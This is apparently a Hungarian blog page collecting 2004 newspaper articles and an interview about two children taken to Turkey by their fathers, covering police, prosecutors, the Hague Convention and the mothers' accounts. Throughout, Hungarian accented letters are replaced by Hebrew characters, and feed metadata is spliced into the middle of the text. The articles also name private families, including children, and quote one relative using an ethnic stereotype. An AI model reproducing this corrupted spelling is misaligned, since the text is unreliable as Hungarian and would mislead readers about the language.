תgy tudjבk, az apa יs a gyermek is mיg Magyarorszבgon van. Bבr ezt az בllםtבst az ORFK szףvivője cבfolta, a Csongrבd Megyei Rendőr-főkapitבnysבg םrבsban kצzצlte lapunkkal, hogy a rendőrsיg a maga rיszיről mindent elkצvetett felkutatבsבra. Eltűntkיnt itthon יs klfצldצn is kצrצztettיk a kisfiתt, egyתttal kiskorת elhelyezיsיnek megvבltoztatבsביrt az apבt is. Kיt hףnappal az eset utבn a megyei főkapitבnysבg fontosnak tartotta kצzצlni, hogy annak idejיn előterjesztיst tettek a vבrosi gyיszsיgnek: adjanak ki nemzetkצzi elfogatףparancsot az apa ellen. A Szegedi Vבrosi gyיszsיg azonban nem tette, בllבspontja szerint ugyanis "a hatבlyos nemzetkצzi szerződיsek rendelkezיsei szerint hazahozatalukra ezek alapjבn nem lenne mףd".</div><div align="justify"><br />Tצrő Sבndor megyei főgyיszhelyettes szerint a Szegedi Vבrosi gyיszsיg helyesen jבrt el. Az apa tצrצk-magyar kettős בllampolgבr, a neki tulajdonםtott bűncselekmיnyt a tצrvיny egy יv szabadsבgvesztיssel fenyegeti, azaz nem olyan sתlyת bűntיnyről van szף, amely nemzetkצzi elfogatףparancs kiadבsבt indokolnב. Nem hagyhatף figyelmen kםvl, hogy Tysz Mehmet tצrצk בllampolgבr is. A gyakorlat az, hogy egyik orszבg sem adja ki sajבt בllampolgבrבt.</div><div align="justify"><br />A főgyיszhelyettes megerősםtette, hogy a Sבndor Istvבn בltal kivitt iratokra tekintettel a tצrצk hatףsבgok rצvid időre őrizetbe vettיk Tysz Mehmetet. Nem zבrta ki, hogy a Magyarorszבgon kiadott elfogatףparancs esetleg nagyobb nyomatיkot adott volna a gyermek utבn kutatף nyugdםjas magyar rendőr szavainak. ֱllבspontja szerint azonban a jelenlegi helyzetben az Igazsבggyi Minisztיriumon keresztl intיzhető a leggyorsabban Karcsika sorsa.</div><div align="justify"><br />Tצrצkorszבg csatlakozott a "jogellenesen klfצldre vitt gyermek visszaadבsבrףl" szףlף nemzetkצzi egyezmיnyhez, ami - a gyermekek יrdekיben - viszonylag gyors eljבrבst םr elő a rיszes בllamok szבmבra. A kיrdיs csak az, hogy a tצrצk apa nem szerzi-e meg hamarabb tצrצkצs nevű gyermekיnek a tצrצk בllampolgבrsבgot, mint amennyi idő alatt lezajlik a visszaadבsi procedתra. Brבvבcz Ottףnי, az Igazsבggyi Minisztיrium nemzetkצzi magבnjogi főosztבlyvezetője kיrdיsnkre leszצgezte: ilyen esetekben nincs jelentősיge az בllampolgבrsבgnak. Az egyezmיny azt םrja elő, hogy a jogellenesen klfצldre vitt gyermekeket vissza kell vinni a "szokבsos tartףzkodבsi helyיre", oda, ahol addig יlt.</div><div align="justify"><br />Tצrצkorszבgban a magyar fיl (akit kצzvetlenl is kיpviselhet tצrצk gyvיd, de kיrיsre a magyar Igazsבggyi Minisztיrium is rיszt vesz a jogיrvיnyesםtיsben) bםrףsבg előtt kיrheti az egyezmיny alapjבn az eredeti helyzet visszaבllםtבsבt. Bבr mozlim orszבgok ez irבnyת bםrףsבgi gyakorlatבt a magyar hatףsבgok nem ismerik, Brבvבcz Ottףnי szerint nincs okunk feltיtelezni, hogy az ottani bםrףsבgok nem a gyermek יrdekei szempontjבbףl legjobb dצntיst hozzבk meg. Ez azonban hףnapokig is eltarthat, attףl fggően, hogy az ellenיrdekű fיl (jelen esetben a tצrצk apa) klצnbצző praktikבkkal meddig hתzza el az eljבrבst.</div><div align="justify"><br /></div><div align="center"><strong><span style="font-size:130%;">Mehmet Karcsika hazatיr?<br /></span>A tצrצk apa iratokat kיrt a magyar konzulבtustףl</strong></div><div align="center"><strong>Fekete Gy. Attila, Nיpszabadsבg, 2004. szept. 7.</strong></div><div align="justify"><br /></div><div align="justify">Hamarosan visszatיrhet Magyarorszבgra a hיt יs fיl יves Mehmet Karcsika, akit jתlius 10-יn rabolt el tצrצk יdesapja - בllםtja Sבndor Istvבn nyugalmazott rendőr alezredes, akit a kisfiת יdesanyja kיrt fel: segםtsen gyermeke felkutatבsבban.</div><div align="justify"><br />Sבndor Istvבn nyugalmazott rendőr alezredes szerint Tצrצkorszבgban sikerlt annyira ellehetetlenםteni Tysz Mehmet (31) יletיt, hogy a fיrfi mבr kיsznek lבtszik visszaadni hיt יs fיl יves kisfiבt volt felesיgיnek, akinek a vבlבskor a magyar bםrףsבg odaםtיlte. A Papa fedőnיven ismerttי vבlt egykori operatםv tiszt lapunknak azt mondta: tudomבsa szerint őrizetbe vettיk a tצrצk hatףsבgok a gyerekrablף apבt, miutבn (tőle, illetve a nבla lיvő hivatalos magyar iratokbףl) megtudtבk, hogy gyakorlatilag elrabolta a gyermeket יdesanyjבtףl, s hamis תtlevיllel utaztatta be Tצrצkorszבgba. Sבndor elmondבsa szerint Tysz Mehmet gyvיdje a kצzelmתltban klצnbצző magyar hatףsבgi igazolבsokיrt jבrt a magyar konzulבtuson, azok hiבnyבban ugyanis az apa nem tudja beםratni a gyermeket a tצrצk iskolבba.</div><div align="justify"><br />Mehmet Karcsikבt jתlius 10-יn lבthatבsra elvitte az יdesapja, de a megbeszיlt időre mבr nem vitte haza. Mבsnap mבr Tצrצkorszבgbףl telefonבlt volt felesיgיnek, hogy amennyiben nem szףl a rendőrsיgnek, יs lemond a vבlבsukkor neki םtיlt kisfiתrףl, nem lesz semmi baj. Az יdesanya, Papp Edina azonban feljelentיst tett a rendőrsיgen. A szegedi rendőrצk azonban kiskorת elhelyezיsיnek megvבltoztatבsa miatt csak Magyarorszבgon kצrצztettיk a kisfiתt, mondvבn: ők תgy tudjבk, Karcsi az יdesapjבval egytt mיg Magyarorszבgon van. Garamvצlgyi Lבszlף, az ORFK szףvivője ezzel szemben az Interpol Magyar Nemzeti Irodבjבnak tבjיkoztatבsבra hivatkozva lapunknak azt mondta: a kisfiת eltűnיsיnek bejelentיsekor elrendeltיk a nemzetkצzi kצrצzיsיt, igaz, csak eltűntkיnt. Kיsőbb, amikor felmerlt, hogy a gyermek Tצrצkorszבgban tartףzkodhat, klצn is kיrtיk az ottani hatףsבgokat, בllapםtsבk meg Mehmet Kבroly tartףzkodבsi helyיt. Vבlaszt mיg nem kaptak.</div><div align="justify"><br />Sבndor Istvבn ezzel szemben Isztambulba utazott, יs megtalבlta az apבt יs Karcsikבt. ֱllםtja: pontosan tudja, ki az a kecskemיti fיrfi, aki a sajבt fia תtlevelיvel Rצszkיnיl בtcsempיszte Karcsikבt a hatבron.</div><div align="justify"><br />Tצrצkorszבgban Sבndor Istvבn felmelegםtette egykori rendőrsיgi kapcsolatait, megtalבlta a "gyerekrablף" apבt, יs kiderםtette, hol talבlhatjבk meg a helyi hatףsבgok Karcsikבt. Az בllםtja, ha a konzulבtus kicsit "rugalmasabb" lett volna, Karcsika mבr rיg az יdesanyjבval lehetne. A kisfiת תtlevele ugyanis nבluk volt, s ha sikerlt volna beutazף vםzumot szerezni bele - יs szerinte sikerlt volna -, Karcsika "simבn hazaautףzhatott volna" a nyugalmazott magyar rendőrtiszttel.<br /><br />Sבndor Istvבn optimizmusa dacבra a tצrצk apa mיg mindig elיrheti, hogy gyermekיt ne kelljen visszaadni magyar יdesanyjבnak. Ő az יdesapa, s a gyermeknek tצrצk neve van, םgy kצnnyen megkaphatja az בllampolgבrsבgot. ֹdesanyja csak abban bםzhat, hogy a tצrצk rendőrsיg lיpיsei יs a sajtףhםrverיs hatבsבra ez mיgsem sikerl neki. A magyar hatףsבgok azonban mיg nem tettek יrdemi lיpיseket a jogerős bםrףi dצntיs ellenיre klfצldre hurcolt, s mיg magyar בllampolgבrsבgת kisfiת hazahozatala יrdekיben.</div><div align="center"><span style="font-size:130%;"><strong></strong></span><br /></div><div align="center"><span style="font-size:130%;"><strong>Tצrצkorszבgba csempיszett gyermek - elfogatףparancsot srget az gyvיd </strong></span></div><span style="font-size:130%;"><strong><div align="justify"></strong></span><br /><strong>Szeged, 2004. augusztus 31., kedd (MTI)</strong> - Nemzetkצzi elfogatףparancs kiadבsבt tartja szksיgesnek annak a szegedi nőnek az gyvיdje, akinek hיt יs fיl יves kisfiבt a gyermek tצrצk szבrmazבsת apja a nyבron engedיly nיlkl Tצrצkorszבgba vitte.</div><div align="justify"><br />Rבcz Roland kedden az MTI-nek azt mondta, hogy az apa ellen ki kellene adni a nemzetkצzi elfogatף parancsot, mert תgy gondoljבk, ahol az apa, ott van a gyerek is. "Erre azיrt van szksיg, hogy a tצrצk hatףsבg lבssa: a gyermeket Szegedről jogellenesen vittיk el" - kצzצlte az gyvיd. </div><div align="justify"><br />Elmondta: az anyבval egytt jelenleg arra vבrnak, hogy az Igazsבggyi Minisztיriumhoz benyתjtott kיrelmket - amelyben a kisfiת haza hozatalבhoz kיrnek segםtsיget - a tבrca tצrצk nyelvre lefordםtva eljuttassa a tצrצk hatףsבgokhoz.</div><div align="justify"><br />A kיrelmet az gyvיd is lefordםttatta, יs egyתttal megkldte a tצrצk igazsבggyi tבrcבnak is. Rבcz Roland elmondta, hogy az idő mתlבsa nem kedvez az gynek. A gyermek magyar בllampolgבr, a tצrצk-magyar בllampolgבrsבgת apa viszont minden bizonnyal meg akarja szerezni elsőszlצtt fiבnak a tצrצk בllampolgבrsבgot is. Ha ez sikerl, mיg nehezebb lesz haza hozatni a gyermeket - mondta.</div><div align="justify"><br />Az gyvיd szerint az apa az anyjבtףl - akivel korבbban יlettבrsi viszonyban יlt - jתlius 10-יn vitte el lבthatבsra a kisfiתt, de nem mentek vissza időre. Az anya bejelentיst tett a rendőrsיgen. Kיsőbb telefonבlt az apa, יs azt mondta: Tצrצkorszבgban van a gyermekkel egytt, majd kיrte az asszonyt, mondjon le a kisfiתrףl.</div><div align="justify"><br />A gyermek klfצldre csempיszיsיnek mףdjבrףl az gyvיd יs az anya is a sajtףbףl יrteslt. "A kisfiתt elaltattבk, יs idegen תtlevיllel vittיk בt a hatבron" - kצzצlte az gyvיd.</div><div align="justify"><br />A szegedi rendőrkapitבnysבg augusztus 4-יn sajtףkצzlemיnyt adott ki arrףl, hogy nyomozבst folytat kiskorת elhelyezיsיnek megvבltoztatבsa vיtsיg megalapozott gyanתja miatt az apa, Tysz Mehmet ellen.</div><div align="justify"><br />Rבcz Roland elmondta: azt a tבjיkoztatבst kapta, hogy mבr korבbban kiadtבk a kisfiת eltűnיsיvel kapcsolatban a nemzetkצzi kצrצzיst. Az apבt kצzben a tצrצk rendőrsיg elfogta יs kihallgatta, majd elengedte. A kisfiתt szintיn megtalבltבk, az gyvיd יs az anya informבciףi szerint talבn a tצrצk nagyszlőknיl van.</div><div align="justify"><br />Az anya, Papp Edina az MTI-nek elmondta, szeretnי minיl előbb visszakapni a fiבt, akiről jתlius 10-e ףta csak annyit tud, hogy megvan. "Magyar בllampolgבr a fiam, a magyar bםrףsבg nבlam helyezte el" - kצzצlte.<br /><br /></div><div align="center"><span style="font-size:130%;"><strong></strong></span></div><div align="center"><span style="font-size:130%;"><strong>Isztambulba loptבk ki Karcsikבt</strong></span></div><div align="center"><strong>Szםnes Mai Lap, 2004. augusztus 30.</strong></div><br /><div align="justify">A szegedi Papp Edina vיgső kיtsיgbeesיsיben fordult előbb Sבndor Istvבnhoz, Papבhoz, majd a sajtףhoz. Tצrצk-magyar בllampolgבrsבgת volt יlettבrsa, Tysz Mehmet jתlius 10-יn elvitte magבval hיt יs fיl יves kisfiukat, Karcsikבt azzal, hogy mבsnap visszaviszi. A fיrfi azonban eltűnt a gyerekkel egytt.</div><div align="justify"><br />Egy nap mתlva Tצrצkorszבgbףl hםvta Edinבt. „Ha nem szףlsz a rendőrצknek, יs lemondasz Karcsikבrףl, nem lesz baj”, mondta volt pבrjבnak Tysz. Az asszony azonnal rohant a rendőrsיgre, יs feljelentיst tett.</div><div align="justify"><br />A szegedi rendőrkapitבnysבg kiskorת elhelyezיsיnek megvבltoztatבsa miatt bntetőeljבrבst indםtott az apa ellen, elrendelve a fיrfi יs a gyerek kצrצzיsיt – de csak Magyarorszבgon. Az asszony kיt hete fordult az ORFK egykori Kצzponti Bűngyi Igazgatףsבg (KBI) letartףztatott, bםrףsבg elי בllםtott, majd felmentett fedett nyomozףjבhoz, Sבndor Istvבnhoz. Az egykori fedőnevיn Papakיnt kצzismert Sבndor Isztambulban talבlta meg az apבt יs fiבt.</div><div align="justify"><br />– Felhבborםtף a magyar hatףsבgok hozzבבllבsa! – hבborgott lapunknak a ma magבnynyomozף Papa. – Szegeden kצzצltיk velem, hogy azיrt nem adnak ki nemzetkצzi elfogatףparancsot Tysz Mehmet ellen, mert תgy tudjבk, fiבval egytt Magyarorszבgon bujkבl. Az isztambuli konzul יpp most kצzצlte velem, a tצrצk fיrfi gyvיdjיvel egytt megjelent nבla, hogy adjon ki egy hivatalos igazolבst, mivel tצrצk szemיlyi igazolvבnyt akar csinבltatni a fiבnak. </div><div align="justify"><br />A rendőrsיg egyיbkיnt kיrte az apa יs fia nemzetkצzi kצrצzיsיt, בm az gyיszsיg nem terjesztette az indםtvבnyt a bםrףsבg elי, mondvבn: nincs יrtelme. A tצrצk apבt nem adjבk ki a tצrצkצk, a gyerek kiadatבsבra viszont nemzetkצzi egyezmיny kצtelezi.</div><div align="justify"><br />Papa egykori tצrצk kapcsolatai ma is יlnek. Nem vיletlen, hogy a tצrצk rendőrsיg תgy fogadta, mintha ma is rendőr lenne. A tצrצk rendőrצknek Papa letette a „Mehmet-dossziיt”. Kinyomozta ugyanis, hogy melyik isztambuli lakבsban hתzta meg magבt Tysz. Itt rejtegette a kisfiתt is. A tצrצk rendőrsיg el is fogta az apבt יs annak testvיrיt emberrablבs miatt, בm a bםrף vיgl nem tartףztatta le őket.</div><div align="justify"><br />– Pontosan tudom, hogy ki az a kecskemיti fיrfi, aki a sajבt fia תtlevelיvel, sajבt piros Ladבjבn תgy csempיszte ki Rצszkיnיl a gyereket, hogy az apבval kצzצsen bealtatףzta a fiתt. A hatבrőrצknek nem tűnt fel, hogy az תtlevיlben szereplő gyerek nem azonos a hבtsף lיsen alvף gyerekkel. Megtalבltam azt a szervizt is Isztambul kצzelיben, ahol a lerobbant Ladבt megjavםtottבk – בrulta el Papa. – A magyar hatףsבgok mיg arra sem veszik a fבradtsבgot, hogy elszבmoltassבk ezt a kecskemיti fיrfit, nemhogy emberrablבs miatt elfognבk.</div><div align="justify"><br />A tצrצk hatףsבgok első kצrben kיsznek mutatkoztak a magyar gyerek hazajuttatבsבra, בm ehhez hivatalos papםrokat kיrtek. Dr. Rבcz Roland, az anya gyvיdje ezיrt az Igazsבggyi Minisztיriumhoz fordult, hogy kיrjיk a gyerek kiadבsבt.</div><div align="justify"><br />Karcsikבt egyיbkיnt a Szegedi Bםrףsבg mבr 2003 mבjusבban az יdesanyבnak םtיlte.</div><div align="justify"><br />Isztambuli forrבsbףl megtudtuk, hogy egyבltalבn nem biztos a gyerek kiadatבsa. Amennyiben a magyar kיrelem hithű bםrףhoz kerl, az iszlבm szerint fog םtיlni, יs lיvיn a gyerek elsőszlצtt fiת, apja utבn muszlimnak szבmםt, ezיrt nem fogja kiadni.</div><div align="justify"><br /></div><div align="center"><a href="http://axel.hu/cikk/axel.hu/38388"><strong><span style="font-size:130%;">Sajבt gyermekיt rejtegeti a szegedi Tysz Mehmet</span></strong></a></div><div align="center"><strong>axel.hu, 2004. augusztus 05.<br /></strong></div><div align="justify">Kiskorת elhelyezיsיnek megvבltoztatבsa miatt nyomoz a rendőrsיg Tysz Mehmet 31 יves szegedi lakos, tצrצk-magyar kettős בllampolgבr ellen, aki megalapozottan gyanתsםthatף azzal, hogy gyermek-lבthatבs rgyיn magבval vitte 7 esztendős kisfiבt, akinek azףta nyoma veszett.<br /><br /></div><div align="justify"></div><div align="justify">A gyermeket jתlius 11-יn kellett volna visszavinnie az יdesanyבnak, בm ennek nem tett eleget, יs azףta is ismeretlen helyen rejtegeti – בll az Objektםv Hםrgynצksיg jelentיsיben. </div><div align="justify"><br /></div><div align="justify"><a href="http://web.b-m.hu/belugy/hir2002.nsf/bee84140eca294f0c1256b3900000adb/9f79b4a8b18071c7c1256ee60047f66d?OpenDocument">A szegedi rendőrsיg keresi apבt יs fiבt</a> - <strong>2004. aug. 4.</strong></div> -false - - - - - -Efendi - -2004-08-27T11:03:52+02:00 -2005-01-07T22:59:52Z -2004-08-27T09:06:40Z - -tag:blogger.com,1999:blog-7074887.post-109359760002803868 -Raskף Szofi tצrtיnete -<span style="color:#000000;"><div align="center">Problיmבs vegyeshבzassבgok</div><div align="center"><strong><span style="font-size:130%;"><a href="http://www.hetek.hu/index.php?cikk=47304">Tצrצkצt fogott, nem engedte</a></span></strong></div><div align="center">Hajdת Sבndor, Hetek, 2004. nov. 19.</div><div align="justify"></div><div align="justify"> <br />Szolnok egyik klső kerlete Szandaszőlős. A buszmegבllףban fiatalok igazםtanak תtba, amikor a Raskף csalבdot keresem. „Tףbiבs a kocsma neve, ott יrdeklődjצn bבtran” – mondja egy fiatal srבc, יs lerajzolja, hogy mikיnt jutok a „helyszםnre”. Az alagsori mulatףt messziről felismerni, mert vצlt a zene. A pultnבl ordםtva kצzlצm, kit keresek, mire a raktבrbףl előjצn egy fiatal srבc, Tamבs, Emese testvיre. A zaj miatt az udvaron mutatkozom be, יs mondanבm, mi a jצvetelem cיlja, de mבr fיlbe is szakםt: „Hazaיrkezיsnk utבn a bulvבrsajtף szinte mindent kiteregetett rףlunk, ezיrt nem בllunk szףba senkivel.”</div><div align="justify"> <br />Pedig az esemיnyről csak szűkszavת hםrek jelentek meg: Nemrיg tיrt haza a hבromיves szolnoki illetősיgű Raskף Szofi יs יdesanyja, Emese, akik Ankarבban, a magyar nagykצvetsיgen bתjtak el a gyermek tצrצk apja, ײzbas Fatih elצl. Az egykori birkףzףbajnok az יv elejיn az anya tudta nיlkl csempיszte Tצrצkorszבgba Szofit. Az anya mבrciusban kiutazott utבnuk, de ײzbas elvette mindkettejk תtlevelיt. Az asszony gyermekיvel klkיpviseletnkre meneklt a fenyegetőző apa elől, s hףnapokig ott tartףzkodott. Ennyi, ami a hivatalos hםradבsokbףl kiderlt. <br /> <br />Hiבba prףbבlkozunk, nem fog senkivel szףba בllni Emese, ez a tuti – vetette oda a mellettem בllף fiatal srבc a Tףbiבs „יtteremben”. Az תjsבgםrףk nem יppen nיpszerűek errefelי mostanבban – tette hozzב mיg, יs hiבba prףbבlok יrvelni, elutasםtבs a vבlasz. Abban maradunk, majd telefonon folytatjuk, de sajnos tצbbszצri יrdeklődיsnk utבn kiderlt, Emese םgy sem, a tצrtיntek utבn tצbb hיttel sem akar nyilatkozni senkinek. Mindצssze a csalבd egyik kצzeli ismerősיvel sikerlt beszיlgetnnk, aki elmondta, hogy Emese Nיmetorszבgban ismerte meg a tצrצk sportolףt. Mint mesיlte, szבmukra meglepő volt olykor a fיrfi viselkedיse, mivel hol תgy viselkedett, mint egy בtlag „vilבgi”, hol pedig תgy, mint egy vallבsos mohamedבn. Amikor jף passzban volt – azaz olyan volt, mint a tצbbiek–, lehetett vele szףrakozni, sצrצzni, de volt hogy előjצtt belőle a „tצrצk vיr”, יs olyankor előfordult, hogy agresszםvvב vבlt, יs יrthetetlen mףdon kezdett viselkedni. „Az az egיszben a legszomorתbb, hogy mikor תjra egytt יltek, ismיt fogant egy kisbaba, aki most fog decemberben megszletni, יs ez a felhajtבs nem hiבnyzik nekik. Mondjבk errefelי a nיpek, hogy nem kellett volna szףba בllni ezzel a tצrצkkel תjra, de hבt a szerelem יs az יsz nem mindig vannak צsszhangban” – tette hozzב kezיt szיttבrva a rokon. <br /> <br /></div><div align="justify">Bבrsony Andrבs, a Klgyminisztיrium politikai בllamtitkבra szerint ez egy jogi יrtelemben nem rendezett csalבdi kצtelיk volt a tצrצk fיrfi יs a magyar hצlgy kצzצtt abban az יrtelemben, hogy nem יltek hבzassבgi kצtelיkben. Minden informבciף azt tבmasztotta alב, hogy sem a magyar, sem egyיb tצrvיnyek szerint hבzassבgkצtיsre nem kerlt kצzצttk sor. A kapcsolatuk gymצlcse a kislבny, Szofi. Az יdesapa egy magyarorszבgi lבtogatבsa sorבn a nיmet תtlevelיbe bejegyeztette a gyermeket, יs ezzel az תtlevיllel a kicsit „hףna alב kapva” elhagyta az orszבgot. Az יdesanya utבna utazott, hogy a kislבnyt hazahozza. Elvitte Szofi magyar תtlevelיt, יs megprףbבlta a gyermeket Tצrצkorszבgbףl hazahozni. A tצrצk hatףsבgok azonban feltartףztattבk, mert nem volt regisztrבlva a magyar תtlevיlbe, hogy a gyermek mikor lיpett be Tצrצkorszבgba, ezיrt nem engedtיk ki a kislבnyt az orszבgbףl. Az בllamtitkבr elmondta, hogy ezt kצvetően az ankarai nagykצvetsיgen helyeztיk el az יdesanyבt יs gyermekיt. A gyerek iratai azonban a fיrj csalבdjבnבl voltak, akik jogellenesen maguknבl tartottבk a Magyar Kצztבrsasבg tulajdonבt kיpező okmבnyokat.„ A tצrצk hatףsבgok tצbb megkeresיsre – amelyet a magyar diplomבcia a szokבsos diplomבciai csatornבkon keresztl megtett – sem reagבltak. Illetve azt kצzצltיk, hogy miutבn Tצrצkorszבgban bntetőeljבrבs folyik az gyben, ezיrt a Klgyminisztיriumnak semmilyen befolyבsa nincs a dologra, azaz meg kell vבrniuk, amםg a tצrצk igazsבgszolgבltatבs ebben az gyben majd בllבst foglal. Kצzeledett az időpont, amikor az תjabb gyermek megszlethetett, ezיrt bekיrettיk a minisztיriumba a tצrצk nagykצvetet” – magyarבzta Bבrsony Andrבs. A tצrצk fיl magatartבsa ugyanis szבmtalan tekintetben tkצzצtt a nemzetkצzi joggal, a Hבgai Konvenciףval, amely a gyermekek mozgבsבnak jogellenes korlבtozבsבrףl szףl. A magyar diplomבcia vיlemיnye szerint ugyanis a gyermeket jogellenesen csempיsztיk ki Magyarorszבgrףl.</div><div align="justify"> <br /></div><div align="justify">A tצrצk hatףsבgok ezutבn rצviddel kezdemיnyeztיk a bםrףsבgon a fiatalasszony יs a gyermek eltבvozבsבt. Mondvבn, hogy az gyיszsיgi eljבrבs, amely tulajdonkיppen megakadבlyozta az ő hazatיrיsket, nem felelt meg a tצrצk jog előםrבsainak, ezיrt megsemmisםtette az gyיszsיg ilyen irבnyת hatבrozatבt, יs lehetővי tette, hogy gyermek יs יdesanyja elhagyjבk Tצrצkorszבgot.</div><div align="justify"> <br /></div><div align="justify"></div><div align="justify">Bבrsony Andrבs azt is elmondta, hogy בltalבban az arab orszבgokba hבzasodף polgבrtבrsaink esetיben fordul elő, hogy a hבzastבrsi kapcsolat megromlבsבt kצvetően sתlyos konfliktus יs jogi vita alakul ki a kצzצs gyermek elhelyezיse kapcsבn. </div><div align="justify"> <br /></div><div align="justify"><span style="color:#ff0000;"><strong>Efendi megjegyzיse:</strong> Hajdת Sבndor bevezetője szerint a"hivatalos hםradבsokbףl" (ki tudja, mik ezek) יppen, hogy valami kiderlt Raskף Szofi tצrtיnetיről. Ha elolvassa az alבbbi cikkeket, nyilvבnvalףan mבs volna a vיlemיnye. Azיrt az jף volna, ha az תjsבgםrף olvasnב is, s nemcsak םrnב a hםreket. Mindamellett tiszteljk Hajdת Sבndort, hogy jףval Szofi hazatיrיse utבn is יrdekli őt a csalבd sorsa יs a szerencsיtlen tצrtיnet kצrlmיnyei. Ami pedig a "jogi יrtelemben nem rendezett csalבdi kצtelיket" illeti:ez az בllםtבs tיvedיs - amint Raskף Emese nyilatkozatבbףl is kiderl, Szofi anyja יs apja viszonya jogilag rendezett volt, mindkיt fיl szlői felgyeleti joggal rendelkezett, ez azonban nem jelenthette azt, hogy az apa jogszerűen tartףsan klfצldre vihette a kislבnyt. </span></div><div align="center"></div><div align="center"> <br /><span style="font-size:130%;"><strong>"Bennem van a fיlelem"</strong></span></div><div align="center"> <br /></div><div align="center"><em><strong>A Tצrצkorszבgbףl hazatיrt, bujkבlף szolnoki anya vallomבsa</strong></em> </div><div align="center"> <br /></div><div align="center"><em>Nיpszabadsבg, Doros Judit, 2004. oktףber 15.</em></div><div align="justify"></div><div align="justify"> <br /></div><div align="center"><em>Ankarבbףl hazajutva Magyarorszבgon bujkבl volt tצrצk יlettבrsa elől a szolnoki Raskף Emese יs hבromיves kislבnya, Szofi. Attףl fיlnek, ha kiderl a tartףzkodבsi helyk, akkor az יdesapa תjbףl megprףbבlja elrabolni a gyereket. Raskף Emese - akinek sorsבt tצbb hete kצveti nyomon lapunk - kצzvetםtők segםtsיgיvel interjתt adott a Nיpszabadsבgnak: beszבmolt egyebek kצzצtt arrףl, milyen fenyegetיseket kapott a csalבdja, s meddig kיpes egy hבromיves kisgyerekkel titokban, bujkבlva יlni.</em></div><div align="justify"> <br /><em>- Mire szבmםt, mit tesznek azיrt, hogy ne kelljen fיlelemben יlnik?</em></div><div align="justify"> <br />- Az, hogy titokban kellett hazajצnnnk, meghatבrozza a mostani יletnket, יs םgy egyelőre a bujkבlבsra kellett berendezkednnk. Nem tudom, ez meddig fog tartani, de azt gondolom, ha Fatih tudnב, hol vagyunk, תjra megprףbבlnב magבval vinni Szofit. A kצvetkező időben biztonsבgos יletnket gyvיdi יs egyיb segםtsיget igיnybe vיve szeretnיm kialakםtani, hogy ne kelljen nap mint nap fיlelemben יlni.</div><div align="justify"> <br /></div><div align="justify"><em>- Prףbבlt-e egyezsיgre jutni a gyerek gyיben az utףbbi hetekben Fatih ײzbassal?</em></div><div align="justify"> <br /></div><div align="justify">- Fatih szeptember kצzepיn kצlcsצnצs megegyezיst ajבnlott fel, םgy akkor szneteltettnk minden hivatalos intיzkedיst. A megבllapodבsban azonban nem fogadta el a lבtogatבsok korlבtozבsait, vagyis azt, hogy nem jצhet hozzבnk bבrmikor, יs csak felgyelettel lehet Szofival. A megegyezיs alבםrבsבt םgy tצbbszצr elhalasztotta, vיgl megtagadta. Kצzben tצbbszצr megfenyegetett azzal, hogy ez itt Tצrצkorszבg, itt az fog tצrtיnni, amit ő akar, s ha rajta mתlik, soha nem fogunk kijutni az orszבgbףl. Tצbb alkalommal kיrte: menjnk vissza hozzב. Miutבn vilבgossב vבlt szבmבra, hogy ezt nem tudom teljesםteni, mindent megtett azיrt, hogy ne hagyhassuk el az orszבgot. Hazugsבgokat בllםtott a helyi תjsבgok, a rendőrsיg יs az gyיszsיg előtt, pיldבul azt, hogy hבzassבgban יltnk, huzamosabb ideig laktunk egytt, majd kצzצs megegyezיssel telepedtnk le Ankarבban. Azt is בllםtotta, hogy a gyerek felett a felgyeleti jogot kizבrףlag ő gyakorolja, mivel יn arrףl lemondtam. Ez termיszetesen nem igaz.</div><div align="justify"> <br /></div><div align="justify"><em>- Ilyen kצrlmיnyek kצzצtt hogyan יrvיnyesםthetők egyבltalבn az apa jogai, a kapcsolattartבs?</em></div><div align="justify"> <br /></div><div align="justify">- Megegyezיsnk pontosan arrףl szףlt volna, hogy mindkettőnknek megszabja a kצtelessיgeit יs jogait. Az elmתlt hףnapokban Ankarבban nekem nem voltak jogaim, csak kצtelessיgeim. Fatih elvבrta volna, hogy magyarorszבgi lבtogatבsai a gyerek elrablבsa előtti mףdon folytatףdjanak. De יn ezek utבn hogyan adhatnבm oda a gyerekemet, akבr csak nיhבny ףrבra is, rettegיs nיlkl?</div><div align="justify"> <br /></div><div align="justify"><em>- Amםg Ankarבban tartףzkodtak, צnt יs csalבdjבt tצbbszצr is megfenyegettיk.</em></div><div align="justify"> <br /></div><div align="justify">- Szeptember 22-יn egy magyarul jףl beszיlő fיrfi hםvott fel mobiltelefonon. Kצzצlte velem: ő Fatih jף barבtja, יs nagyon bםzik abban, hogy kedvező dצntיst hozunk. Hozzבtette: ha nem, az rבm nיzve szomorת kצvetkezmיnyekkel jבrhat. Kיt nappal ezutבn, valףszםnűleg ugyanaz a fיrfi, az יdesapבmat is felhםvta, יs őt is megfenyegette. A telefonszבmainkat egyedl Fatihtףl tudhattבk meg. Ezutבn Fatih tצbbszצr kldצtt a telefonomra olyan zeneteket, amelyekből egyיrtelműen kiderlt: csalבdunk tagjai veszיlyben vannak. Amםg egytt יltnk Ankarבban, tצbbszצr megfenyegetett, megvert, azt םgיrte, ha nem תgy viselkedem, ahogy neki tetszik, a szleim koporsףban visznek haza. Miutבn hazajצttnk, az gyeink kיpviseletיvel megbםzott tצrצk gyvיdnőmet is megfenyegette.</div><div align="justify"> <br /></div><div align="justify"><em>- Milyen megoldבst lבt arra, hogy vיgre nyugalmuk legyen?</em></div><div align="justify"> <br /></div><div align="justify">- A megegyezיssel - ha alבםrja - mףdot talבlhattunk volna a normבlis kapcsolattartבsra. De most mבr nem lבtok semmi esיlyt arra, hogy valaha is rב merjem bםzni a gyerekemet. Mi a garancia arra, hogy akבr יvek mתlva nem tצrtיnhet valami hasonlף? Fatih előre megtervezte Szofi elrablבsבt. ֹn nem םrtam alב az apai elismerő nyilatkozaton tתlmenően semmilyen, a gyerekem klfצldi בllampolgבrsבgבval, klfצldi anyakצnyvezיsיvel kapcsolatos nyilatkozatot, iratot, יs ezekhez semmilyen mבs mףdon nem adtam hozzבjבrulבsomat. Akkor hogyan kaphatott mיgis nיmet szemיlyi igazolvבnyt, יs hogy kerlhetett bele apja תtlevelיbe?! Nem bםzom mבr Fatihban, יs nem akarok kockבztatni semmit, a tettei kiszבmםthatatlanok. gyvיdhez fordultunk. Amםg nem lבtjuk, milyen lehetősיgeink vannak, nem tudunk tervezni. Otthon, Szolnokon bבrmikor szבmםthatnבnk zaklatבsra, nem lennיnk biztonsבgban. De bבrhol is vagyunk, minden percben bennem van a fיlelem.</div><div align="justify"> <br /></div><div align="justify"><em>- Ezt nem lehet sokבig bםrni, םgy nem lehet יlni, dolgozni, gyereket nevelni.</em></div><div align="justify"> <br /></div><div align="justify">- Kell, hogy legyen megoldבs, 